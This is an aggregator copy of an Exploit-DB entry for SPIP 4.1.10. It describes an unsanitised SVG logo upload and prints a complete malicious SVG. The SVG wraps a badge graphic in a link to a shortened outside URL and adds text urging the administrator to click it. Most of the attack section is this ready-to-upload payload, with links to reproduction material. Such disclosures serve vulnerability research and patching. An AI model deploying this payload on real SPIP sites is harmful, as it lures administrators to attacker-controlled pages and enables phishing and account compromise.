5

[webapps] spip v4.1.10 - Spoofing Admin account

 10 months ago
source link: https://www.exploit-db.com/exploits/51557
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

spip v4.1.10 - Spoofing Admin account

EDB-ID:

51557

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-07-03

Vulnerable App:

## Exploit Title: spip v4.1.10 - Spoofing Admin account 
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/

## Description:
The malicious user can upload a malicious SVG file which file is not
filtered by a security function, and he can trick
the administrator of this system to check his logo by clicking on him
and visiting, maybe a very dangerous URL.
Wrong web app website logic, and not well sanitizing upload function.

STATUS: HIGH- Vulnerability

[+]Exploit:
```SVG
   <svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
     <defs>
       <linearGradient id="badgeGradient">
         <stop offset="0"/>
         <stop offset="1"/>
       </linearGradient>
     </defs>

     <g id="heading">
       <a xlink:href= "https://rb.gy/74f0y">
         <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z"/>
         <!--<text id="label" x="5" y="20" transform = "rotate(-15 10
10)">New</text>-->
         <text id="title" x="40" y="20">Please click on the logo, to
see our design services, on our website, thank you!</text>
       </a>
     </g>

   </svg>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)

## Time spend:
00:37:00

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK